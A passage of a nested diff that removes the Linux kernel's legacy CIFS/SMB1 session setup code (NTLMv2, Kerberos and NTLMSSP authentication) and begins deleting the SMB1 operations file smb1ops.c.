+-	if (ses->user_name != NULL) {
+-		memcpy(tmp, ses->auth_key.response + CIFS_SESS_KEY_SIZE,
+-				ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-		tmp += ses->auth_key.len - CIFS_SESS_KEY_SIZE;
+-
+-		sec_blob->NtChallengeResponse.Length =
+-				cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-		sec_blob->NtChallengeResponse.MaximumLength =
+-				cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-	} else {
+-		/*
+-		 * don't send an NT Response for anonymous access
+-		 */
+-		sec_blob->NtChallengeResponse.Length = 0;
+-		sec_blob->NtChallengeResponse.MaximumLength = 0;
+-	}
+-
+-	cifs_security_buffer_from_str(&sec_blob->DomainName,
+-				      ses->domainName,
+-				      CIFS_MAX_DOMAINNAME_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	cifs_security_buffer_from_str(&sec_blob->UserName,
+-				      ses->user_name,
+-				      CIFS_MAX_USERNAME_LEN,
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	cifs_security_buffer_from_str(&sec_blob->WorkstationName,
+-				      ses->workstation_name,
+-				      ntlmssp_workstation_name_size(ses),
+-				      *pbuffer, &tmp,
+-				      nls_cp);
+-
+-	if ((ses->ntlmssp->server_flags & NTLMSSP_NEGOTIATE_KEY_XCH) &&
+-	    (!ses->server->session_estab || ses->ntlmssp->sesskey_per_smbsess) &&
+-	    !calc_seckey(ses)) {
+-		memcpy(tmp, ses->ntlmssp->ciphertext, CIFS_CPHTXT_SIZE);
+-		sec_blob->SessionKey.BufferOffset = cpu_to_le32(tmp - *pbuffer);
+-		sec_blob->SessionKey.Length = cpu_to_le16(CIFS_CPHTXT_SIZE);
+-		sec_blob->SessionKey.MaximumLength =
+-				cpu_to_le16(CIFS_CPHTXT_SIZE);
+-		tmp += CIFS_CPHTXT_SIZE;
+-	} else {
+-		sec_blob->SessionKey.BufferOffset = cpu_to_le32(tmp - *pbuffer);
+-		sec_blob->SessionKey.Length = 0;
+-		sec_blob->SessionKey.MaximumLength = 0;
+-	}
+-
+-	*buflen = tmp - *pbuffer;
+-setup_ntlmv2_ret:
+-	return rc;
+-}
+-
+-enum securityEnum
+-cifs_select_sectype(struct TCP_Server_Info *server, enum securityEnum requested)
+-{
+-	switch (server->negflavor) {
+-	case CIFS_NEGFLAVOR_EXTENDED:
+-		switch (requested) {
+-		case Kerberos:
+-		case RawNTLMSSP:
+-			return requested;
+-		case Unspecified:
+-			if (server->sec_ntlmssp &&
+-			    (global_secflags & CIFSSEC_MAY_NTLMSSP))
+-				return RawNTLMSSP;
+-			if ((server->sec_kerberos || server->sec_mskerberos) &&
+-			    (global_secflags & CIFSSEC_MAY_KRB5))
+-				return Kerberos;
+-			fallthrough;
+-		default:
+-			return Unspecified;
+-		}
+-	case CIFS_NEGFLAVOR_UNENCAP:
+-		switch (requested) {
+-		case NTLMv2:
+-			return requested;
+-		case Unspecified:
+-			if (global_secflags & CIFSSEC_MAY_NTLMV2)
+-				return NTLMv2;
+-			break;
+-		default:
+-			break;
+-		}
+-		fallthrough;
+-	default:
+-		return Unspecified;
+-	}
+-}
+-
+-struct sess_data {
+-	unsigned int xid;
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct nls_table *nls_cp;
+-	void (*func)(struct sess_data *);
+-	int result;
+-
+-	/* we will send the SMB in three pieces:
+-	 * a fixed length beginning part, an optional
+-	 * SPNEGO blob (which can be zero length), and a
+-	 * last part which will include the strings
+-	 * and rest of bcc area. This allows us to avoid
+-	 * a large buffer 17K allocation
+-	 */
+-	int buf0_type;
+-	struct kvec iov[3];
+-};
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-sess_alloc_buffer(struct sess_data *sess_data, int wct)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct smb_hdr *smb_buf;
+-
+-	rc = small_smb_init_no_tc(SMB_COM_SESSION_SETUP_ANDX, wct, ses,
+-				  (void **)&smb_buf);
+-
+-	if (rc)
+-		return rc;
+-
+-	sess_data->iov[0].iov_base = (char *)smb_buf;
+-	sess_data->iov[0].iov_len = be32_to_cpu(smb_buf->smb_buf_length) + 4;
+-	/*
+-	 * This variable will be used to clear the buffer
+-	 * allocated above in case of any error in the calling function.
+-	 */
+-	sess_data->buf0_type = CIFS_SMALL_BUFFER;
+-
+-	/* 2000 big enough to fit max user, domain, NOS name etc. */
+-	sess_data->iov[2].iov_base = kmalloc(2000, GFP_KERNEL);
+-	if (!sess_data->iov[2].iov_base) {
+-		rc = -ENOMEM;
+-		goto out_free_smb_buf;
+-	}
+-
+-	return 0;
+-
+-out_free_smb_buf:
+-	cifs_small_buf_release(smb_buf);
+-	sess_data->iov[0].iov_base = NULL;
+-	sess_data->iov[0].iov_len = 0;
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-	return rc;
+-}
+-
+-static void
+-sess_free_buffer(struct sess_data *sess_data)
+-{
+-	struct kvec *iov = sess_data->iov;
+-
+-	/*
+-	 * Zero the session data before freeing, as it might contain sensitive info (keys, etc).
+-	 * Note that iov[1] is already freed by caller.
+-	 */
+-	if (sess_data->buf0_type != CIFS_NO_BUFFER && iov[0].iov_base)
+-		memzero_explicit(iov[0].iov_base, iov[0].iov_len);
+-
+-	free_rsp_buf(sess_data->buf0_type, iov[0].iov_base);
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-	kfree_sensitive(iov[2].iov_base);
+-}
+-
+-static int
+-sess_establish_session(struct sess_data *sess_data)
+-{
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-
+-	cifs_server_lock(server);
+-	if (!server->session_estab) {
+-		if (server->sign) {
+-			server->session_key.response =
+-				kmemdup(ses->auth_key.response,
+-				ses->auth_key.len, GFP_KERNEL);
+-			if (!server->session_key.response) {
+-				cifs_server_unlock(server);
+-				return -ENOMEM;
+-			}
+-			server->session_key.len =
+-						ses->auth_key.len;
+-		}
+-		server->sequence_number = 0x2;
+-		server->session_estab = true;
+-	}
+-	cifs_server_unlock(server);
+-
+-	cifs_dbg(FYI, "CIFS session established successfully\n");
+-	return 0;
+-}
+-
+-static int
+-sess_sendreceive(struct sess_data *sess_data)
+-{
+-	int rc;
+-	struct smb_hdr *smb_buf = (struct smb_hdr *) sess_data->iov[0].iov_base;
+-	__u16 count;
+-	struct kvec rsp_iov = { NULL, 0 };
+-
+-	count = sess_data->iov[1].iov_len + sess_data->iov[2].iov_len;
+-	be32_add_cpu(&smb_buf->smb_buf_length, count);
+-	put_bcc(count, smb_buf);
+-
+-	rc = SendReceive2(sess_data->xid, sess_data->ses,
+-			  sess_data->iov, 3 /* num_iovecs */,
+-			  &sess_data->buf0_type,
+-			  CIFS_LOG_ERROR, &rsp_iov);
+-	cifs_small_buf_release(sess_data->iov[0].iov_base);
+-	memcpy(&sess_data->iov[0], &rsp_iov, sizeof(struct kvec));
+-
+-	return rc;
+-}
+-
+-static void
+-sess_auth_ntlmv2(struct sess_data *sess_data)
+-{
+-	int rc = 0;
+-	struct smb_hdr *smb_buf;
+-	SESSION_SETUP_ANDX *pSMB;
+-	char *bcc_ptr;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u32 capabilities;
+-	__u16 bytes_remaining;
+-
+-	/* old style NTLM sessionsetup */
+-	/* wct = 13 */
+-	rc = sess_alloc_buffer(sess_data, 13);
+-	if (rc)
+-		goto out;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	bcc_ptr = sess_data->iov[2].iov_base;
+-	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
+-
+-	pSMB->req_no_secext.Capabilities = cpu_to_le32(capabilities);
+-
+-	/* LM2 password would be here if we supported it */
+-	pSMB->req_no_secext.CaseInsensitivePasswordLength = 0;
+-
+-	if (ses->user_name != NULL) {
+-		/* calculate nlmv2 response and session key */
+-		rc = setup_ntlmv2_rsp(ses, sess_data->nls_cp);
+-		if (rc) {
+-			cifs_dbg(VFS, "Error %d during NTLMv2 authentication\n", rc);
+-			goto out;
+-		}
+-
+-		memcpy(bcc_ptr, ses->auth_key.response + CIFS_SESS_KEY_SIZE,
+-				ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-		bcc_ptr += ses->auth_key.len - CIFS_SESS_KEY_SIZE;
+-
+-		/* set case sensitive password length after tilen may get
+-		 * assigned, tilen is 0 otherwise.
+-		 */
+-		pSMB->req_no_secext.CaseSensitivePasswordLength =
+-			cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
+-	} else {
+-		pSMB->req_no_secext.CaseSensitivePasswordLength = 0;
+-	}
+-
+-	if (ses->capabilities & CAP_UNICODE) {
+-		if (!IS_ALIGNED(sess_data->iov[0].iov_len, 2)) {
+-			*bcc_ptr = 0;
+-			bcc_ptr++;
+-		}
+-		unicode_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
+-	} else {
+-		ascii_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
+-	}
+-
+-
+-	sess_data->iov[2].iov_len = (long) bcc_ptr -
+-			(long) sess_data->iov[2].iov_base;
+-
+-	rc = sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
+-
+-	if (smb_buf->WordCount != 3) {
+-		rc = -EIO;
+-		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
+-		goto out;
+-	}
+-
+-	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
+-		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
+-
+-	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
+-	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
+-
+-	bytes_remaining = get_bcc(smb_buf);
+-	bcc_ptr = pByteArea(smb_buf);
+-
+-	/* BB check if Unicode and decode strings */
+-	if (bytes_remaining == 0) {
+-		/* no string area to decode, do nothing */
+-	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
+-		/* unicode string area must be word-aligned */
+-		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
+-			++bcc_ptr;
+-			--bytes_remaining;
+-		}
+-		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				      sess_data->nls_cp);
+-	} else {
+-		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				    sess_data->nls_cp);
+-	}
+-
+-	rc = sess_establish_session(sess_data);
+-out:
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-	sess_free_buffer(sess_data);
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = NULL;
+-}
+-
+-#ifdef CONFIG_CIFS_UPCALL
+-static void
+-sess_auth_kerberos(struct sess_data *sess_data)
+-{
+-	int rc = 0;
+-	struct smb_hdr *smb_buf;
+-	SESSION_SETUP_ANDX *pSMB;
+-	char *bcc_ptr;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u32 capabilities;
+-	__u16 bytes_remaining;
+-	struct key *spnego_key = NULL;
+-	struct cifs_spnego_msg *msg;
+-	u16 blob_len;
+-
+-	/* extended security */
+-	/* wct = 12 */
+-	rc = sess_alloc_buffer(sess_data, 12);
+-	if (rc)
+-		goto out;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	bcc_ptr = sess_data->iov[2].iov_base;
+-	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
+-
+-	spnego_key = cifs_get_spnego_key(ses, server);
+-	if (IS_ERR(spnego_key)) {
+-		rc = PTR_ERR(spnego_key);
+-		spnego_key = NULL;
+-		goto out;
+-	}
+-
+-	msg = spnego_key->payload.data[0];
+-	/*
+-	 * check version field to make sure that cifs.upcall is
+-	 * sending us a response in an expected form
+-	 */
+-	if (msg->version != CIFS_SPNEGO_UPCALL_VERSION) {
+-		cifs_dbg(VFS, "incorrect version of cifs.upcall (expected %d but got %d)\n",
+-			 CIFS_SPNEGO_UPCALL_VERSION, msg->version);
+-		rc = -EKEYREJECTED;
+-		goto out_put_spnego_key;
+-	}
+-
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
+-					 GFP_KERNEL);
+-	if (!ses->auth_key.response) {
+-		cifs_dbg(VFS, "Kerberos can't allocate (%u bytes) memory\n",
+-			 msg->sesskey_len);
+-		rc = -ENOMEM;
+-		goto out_put_spnego_key;
+-	}
+-	ses->auth_key.len = msg->sesskey_len;
+-
+-	pSMB->req.hdr.Flags2 |= SMBFLG2_EXT_SEC;
+-	capabilities |= CAP_EXTENDED_SECURITY;
+-	pSMB->req.Capabilities = cpu_to_le32(capabilities);
+-	sess_data->iov[1].iov_base = msg->data + msg->sesskey_len;
+-	sess_data->iov[1].iov_len = msg->secblob_len;
+-	pSMB->req.SecurityBlobLength = cpu_to_le16(sess_data->iov[1].iov_len);
+-
+-	if (ses->capabilities & CAP_UNICODE) {
+-		/* unicode strings must be word aligned */
+-		if (!IS_ALIGNED(sess_data->iov[0].iov_len + sess_data->iov[1].iov_len, 2)) {
+-			*bcc_ptr = 0;
+-			bcc_ptr++;
+-		}
+-		unicode_oslm_strings(&bcc_ptr, sess_data->nls_cp);
+-		unicode_domain_string(&bcc_ptr, ses, sess_data->nls_cp);
+-	} else {
+-		/* BB: is this right? */
+-		ascii_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
+-	}
+-
+-	sess_data->iov[2].iov_len = (long) bcc_ptr -
+-			(long) sess_data->iov[2].iov_base;
+-
+-	rc = sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out_put_spnego_key;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
+-
+-	if (smb_buf->WordCount != 4) {
+-		rc = -EIO;
+-		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
+-		goto out_put_spnego_key;
+-	}
+-
+-	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
+-		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
+-
+-	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
+-	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
+-
+-	bytes_remaining = get_bcc(smb_buf);
+-	bcc_ptr = pByteArea(smb_buf);
+-
+-	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
+-	if (blob_len > bytes_remaining) {
+-		cifs_dbg(VFS, "bad security blob length %d\n",
+-				blob_len);
+-		rc = -EINVAL;
+-		goto out_put_spnego_key;
+-	}
+-	bcc_ptr += blob_len;
+-	bytes_remaining -= blob_len;
+-
+-	/* BB check if Unicode and decode strings */
+-	if (bytes_remaining == 0) {
+-		/* no string area to decode, do nothing */
+-	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
+-		/* unicode string area must be word-aligned */
+-		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
+-			++bcc_ptr;
+-			--bytes_remaining;
+-		}
+-		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				      sess_data->nls_cp);
+-	} else {
+-		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				    sess_data->nls_cp);
+-	}
+-
+-	rc = sess_establish_session(sess_data);
+-out_put_spnego_key:
+-	key_invalidate(spnego_key);
+-	key_put(spnego_key);
+-out:
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-	sess_free_buffer(sess_data);
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = NULL;
+-}
+-
+-#endif /* ! CONFIG_CIFS_UPCALL */
+-
+-/*
+- * The required kvec buffers have to be allocated before calling this
+- * function.
+- */
+-static int
+-_sess_auth_rawntlmssp_assemble_req(struct sess_data *sess_data)
+-{
+-	SESSION_SETUP_ANDX *pSMB;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u32 capabilities;
+-	char *bcc_ptr;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-
+-	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
+-	if ((pSMB->req.hdr.Flags2 & SMBFLG2_UNICODE) == 0) {
+-		cifs_dbg(VFS, "NTLMSSP requires Unicode support\n");
+-		return -ENOSYS;
+-	}
+-
+-	pSMB->req.hdr.Flags2 |= SMBFLG2_EXT_SEC;
+-	capabilities |= CAP_EXTENDED_SECURITY;
+-	pSMB->req.Capabilities |= cpu_to_le32(capabilities);
+-
+-	bcc_ptr = sess_data->iov[2].iov_base;
+-	/* unicode strings must be word aligned */
+-	if (!IS_ALIGNED(sess_data->iov[0].iov_len + sess_data->iov[1].iov_len, 2)) {
+-		*bcc_ptr = 0;
+-		bcc_ptr++;
+-	}
+-	unicode_oslm_strings(&bcc_ptr, sess_data->nls_cp);
+-
+-	sess_data->iov[2].iov_len = (long) bcc_ptr -
+-					(long) sess_data->iov[2].iov_base;
+-
+-	return 0;
+-}
+-
+-static void
+-sess_auth_rawntlmssp_authenticate(struct sess_data *sess_data);
+-
+-static void
+-sess_auth_rawntlmssp_negotiate(struct sess_data *sess_data)
+-{
+-	int rc;
+-	struct smb_hdr *smb_buf;
+-	SESSION_SETUP_ANDX *pSMB;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u16 bytes_remaining;
+-	char *bcc_ptr;
+-	unsigned char *ntlmsspblob = NULL;
+-	u16 blob_len;
+-
+-	cifs_dbg(FYI, "rawntlmssp session setup negotiate phase\n");
+-
+-	/*
+-	 * if memory allocation is successful, caller of this function
+-	 * frees it.
+-	 */
+-	ses->ntlmssp = kmalloc(sizeof(struct ntlmssp_auth), GFP_KERNEL);
+-	if (!ses->ntlmssp) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-	ses->ntlmssp->sesskey_per_smbsess = false;
+-
+-	/* wct = 12 */
+-	rc = sess_alloc_buffer(sess_data, 12);
+-	if (rc)
+-		goto out;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-
+-	/* Build security blob before we assemble the request */
+-	rc = build_ntlmssp_negotiate_blob(&ntlmsspblob,
+-				     &blob_len, ses, server,
+-				     sess_data->nls_cp);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	sess_data->iov[1].iov_len = blob_len;
+-	sess_data->iov[1].iov_base = ntlmsspblob;
+-	pSMB->req.SecurityBlobLength = cpu_to_le16(blob_len);
+-
+-	rc = _sess_auth_rawntlmssp_assemble_req(sess_data);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	rc = sess_sendreceive(sess_data);
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
+-
+-	/* If true, rc here is expected and not an error */
+-	if (sess_data->buf0_type != CIFS_NO_BUFFER &&
+-	    smb_buf->Status.CifsError ==
+-			cpu_to_le32(NT_STATUS_MORE_PROCESSING_REQUIRED))
+-		rc = 0;
+-
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
+-
+-	if (smb_buf->WordCount != 4) {
+-		rc = -EIO;
+-		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
+-		goto out_free_ntlmsspblob;
+-	}
+-
+-	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
+-	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
+-
+-	bytes_remaining = get_bcc(smb_buf);
+-	bcc_ptr = pByteArea(smb_buf);
+-
+-	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
+-	if (blob_len > bytes_remaining) {
+-		cifs_dbg(VFS, "bad security blob length %d\n",
+-				blob_len);
+-		rc = -EINVAL;
+-		goto out_free_ntlmsspblob;
+-	}
+-
+-	rc = decode_ntlmssp_challenge(bcc_ptr, blob_len, ses);
+-
+-out_free_ntlmsspblob:
+-	kfree_sensitive(ntlmsspblob);
+-out:
+-	sess_free_buffer(sess_data);
+-
+-	if (!rc) {
+-		sess_data->func = sess_auth_rawntlmssp_authenticate;
+-		return;
+-	}
+-
+-	/* Else error. Cleanup */
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = NULL;
+-	kfree_sensitive(ses->ntlmssp);
+-	ses->ntlmssp = NULL;
+-
+-	sess_data->func = NULL;
+-	sess_data->result = rc;
+-}
+-
+-static void
+-sess_auth_rawntlmssp_authenticate(struct sess_data *sess_data)
+-{
+-	int rc;
+-	struct smb_hdr *smb_buf;
+-	SESSION_SETUP_ANDX *pSMB;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	__u16 bytes_remaining;
+-	char *bcc_ptr;
+-	unsigned char *ntlmsspblob = NULL;
+-	u16 blob_len;
+-
+-	cifs_dbg(FYI, "rawntlmssp session setup authenticate phase\n");
+-
+-	/* wct = 12 */
+-	rc = sess_alloc_buffer(sess_data, 12);
+-	if (rc)
+-		goto out;
+-
+-	/* Build security blob before we assemble the request */
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)pSMB;
+-	rc = build_ntlmssp_auth_blob(&ntlmsspblob,
+-					&blob_len, ses, server,
+-					sess_data->nls_cp);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-	sess_data->iov[1].iov_len = blob_len;
+-	sess_data->iov[1].iov_base = ntlmsspblob;
+-	pSMB->req.SecurityBlobLength = cpu_to_le16(blob_len);
+-	/*
+-	 * Make sure that we tell the server that we are using
+-	 * the uid that it just gave us back on the response
+-	 * (challenge)
+-	 */
+-	smb_buf->Uid = ses->Suid;
+-
+-	rc = _sess_auth_rawntlmssp_assemble_req(sess_data);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	rc = sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out_free_ntlmsspblob;
+-
+-	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
+-	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
+-	if (smb_buf->WordCount != 4) {
+-		rc = -EIO;
+-		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
+-		goto out_free_ntlmsspblob;
+-	}
+-
+-	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
+-		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
+-
+-	if (ses->Suid != smb_buf->Uid) {
+-		ses->Suid = smb_buf->Uid;
+-		cifs_dbg(FYI, "UID changed! new UID = %llu\n", ses->Suid);
+-	}
+-
+-	bytes_remaining = get_bcc(smb_buf);
+-	bcc_ptr = pByteArea(smb_buf);
+-	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
+-	if (blob_len > bytes_remaining) {
+-		cifs_dbg(VFS, "bad security blob length %d\n",
+-				blob_len);
+-		rc = -EINVAL;
+-		goto out_free_ntlmsspblob;
+-	}
+-	bcc_ptr += blob_len;
+-	bytes_remaining -= blob_len;
+-
+-
+-	/* BB check if Unicode and decode strings */
+-	if (bytes_remaining == 0) {
+-		/* no string area to decode, do nothing */
+-	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
+-		/* unicode string area must be word-aligned */
+-		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
+-			++bcc_ptr;
+-			--bytes_remaining;
+-		}
+-		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				      sess_data->nls_cp);
+-	} else {
+-		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
+-				    sess_data->nls_cp);
+-	}
+-
+-out_free_ntlmsspblob:
+-	kfree_sensitive(ntlmsspblob);
+-out:
+-	sess_free_buffer(sess_data);
+-
+-	if (!rc)
+-		rc = sess_establish_session(sess_data);
+-
+-	/* Cleanup */
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.response = NULL;
+-	kfree_sensitive(ses->ntlmssp);
+-	ses->ntlmssp = NULL;
+-
+-	sess_data->func = NULL;
+-	sess_data->result = rc;
+-}
+-
+-static int select_sec(struct sess_data *sess_data)
+-{
+-	int type;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-
+-	type = cifs_select_sectype(server, ses->sectype);
+-	cifs_dbg(FYI, "sess setup type %d\n", type);
+-	if (type == Unspecified) {
+-		cifs_dbg(VFS, "Unable to select appropriate authentication method!\n");
+-		return -EINVAL;
+-	}
+-
+-	switch (type) {
+-	case NTLMv2:
+-		sess_data->func = sess_auth_ntlmv2;
+-		break;
+-	case Kerberos:
+-#ifdef CONFIG_CIFS_UPCALL
+-		sess_data->func = sess_auth_kerberos;
+-		break;
+-#else
+-		cifs_dbg(VFS, "Kerberos negotiated but upcall support disabled!\n");
+-		return -ENOSYS;
+-#endif /* CONFIG_CIFS_UPCALL */
+-	case RawNTLMSSP:
+-		sess_data->func = sess_auth_rawntlmssp_negotiate;
+-		break;
+-	default:
+-		cifs_dbg(VFS, "secType %d not supported!\n", type);
+-		return -ENOSYS;
+-	}
+-
+-	return 0;
+-}
+-
+-int CIFS_SessSetup(const unsigned int xid, struct cifs_ses *ses,
+-		   struct TCP_Server_Info *server,
+-		   const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	struct sess_data *sess_data;
+-
+-	if (ses == NULL) {
+-		WARN(1, "%s: ses == NULL!", __func__);
+-		return -EINVAL;
+-	}
+-
+-	sess_data = kzalloc(sizeof(struct sess_data), GFP_KERNEL);
+-	if (!sess_data)
+-		return -ENOMEM;
+-
+-	sess_data->xid = xid;
+-	sess_data->ses = ses;
+-	sess_data->server = server;
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-	sess_data->nls_cp = (struct nls_table *) nls_cp;
+-
+-	rc = select_sec(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	while (sess_data->func)
+-		sess_data->func(sess_data);
+-
+-	/* Store result before we free sess_data */
+-	rc = sess_data->result;
+-
+-out:
+-	kfree_sensitive(sess_data);
+-	return rc;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+deleted file mode 100644
+index 7d1b3fc014d94..0000000000000
+--- a/fs/cifs/smb1ops.c
++++ /dev/null
+@@ -1,1276 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/*
+- *  SMB1 (CIFS) version specific operations
+- *
+- *  Copyright (c) 2012, Jeff Layton <jlayton@redhat.com>
+- */
+-
+-#include <linux/pagemap.h>
+-#include <linux/vfs.h>
+-#include <uapi/linux/magic.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifspdu.h"
+-#include "cifs_unicode.h"
+-#include "fs_context.h"
+-
+-/*
+- * An NT cancel request header looks just like the original request except:
+- *
+- * The Command is SMB_COM_NT_CANCEL
+- * The WordCount is zeroed out
+- * The ByteCount is zeroed out
+- *
+- * This function mangles an existing request buffer into a
+- * SMB_COM_NT_CANCEL request and then sends it.
+- */
+-static int
+-send_nt_cancel(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+-	       struct mid_q_entry *mid)
+-{
+-	int rc = 0;
+-	struct smb_hdr *in_buf = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-
+-	/* -4 for RFC1001 length and +2 for BCC field */
+-	in_buf->smb_buf_length = cpu_to_be32(sizeof(struct smb_hdr) - 4  + 2);
+-	in_buf->Command = SMB_COM_NT_CANCEL;
+-	in_buf->WordCount = 0;
+-	put_bcc(0, in_buf);
+-
+-	cifs_server_lock(server);
+-	rc = cifs_sign_smb(in_buf, server, &mid->sequence_number);
+-	if (rc) {
+-		cifs_server_unlock(server);
+-		return rc;
+-	}
+-
+-	/*
+-	 * The response to this call was already factored into the sequence
+-	 * number when the call went out, so we must adjust it back downward
+-	 * after signing here.
+-	 */
+-	--server->sequence_number;
+-	rc = smb_send(server, in_buf, be32_to_cpu(in_buf->smb_buf_length));
+-	if (rc < 0)
+-		server->sequence_number--;
+-
+-	cifs_server_unlock(server);
+-
+-	cifs_dbg(FYI, "issued NT_CANCEL for mid %u, rc = %d\n",
+-		 get_mid(in_buf), rc);
+-
+-	return rc;
+-}
+-
+-static bool
+-cifs_compare_fids(struct cifsFileInfo *ob1, struct cifsFileInfo *ob2)
+-{
+-	return ob1->fid.netfid == ob2->fid.netfid;
+-}
+-
+-static unsigned int
+-cifs_read_data_offset(char *buf)
+-{
+-	READ_RSP *rsp = (READ_RSP *)buf;
+-	return le16_to_cpu(rsp->DataOffset);
+-}
+-
+-static unsigned int
+-cifs_read_data_length(char *buf, bool in_remaining)
+-{
+-	READ_RSP *rsp = (READ_RSP *)buf;
+-	/* It's a bug reading remaining data for SMB1 packets */
+-	WARN_ON(in_remaining);
+-	return (le16_to_cpu(rsp->DataLengthHigh) << 16) +
+-	       le16_to_cpu(rsp->DataLength);
+-}
+-
+-static struct mid_q_entry *
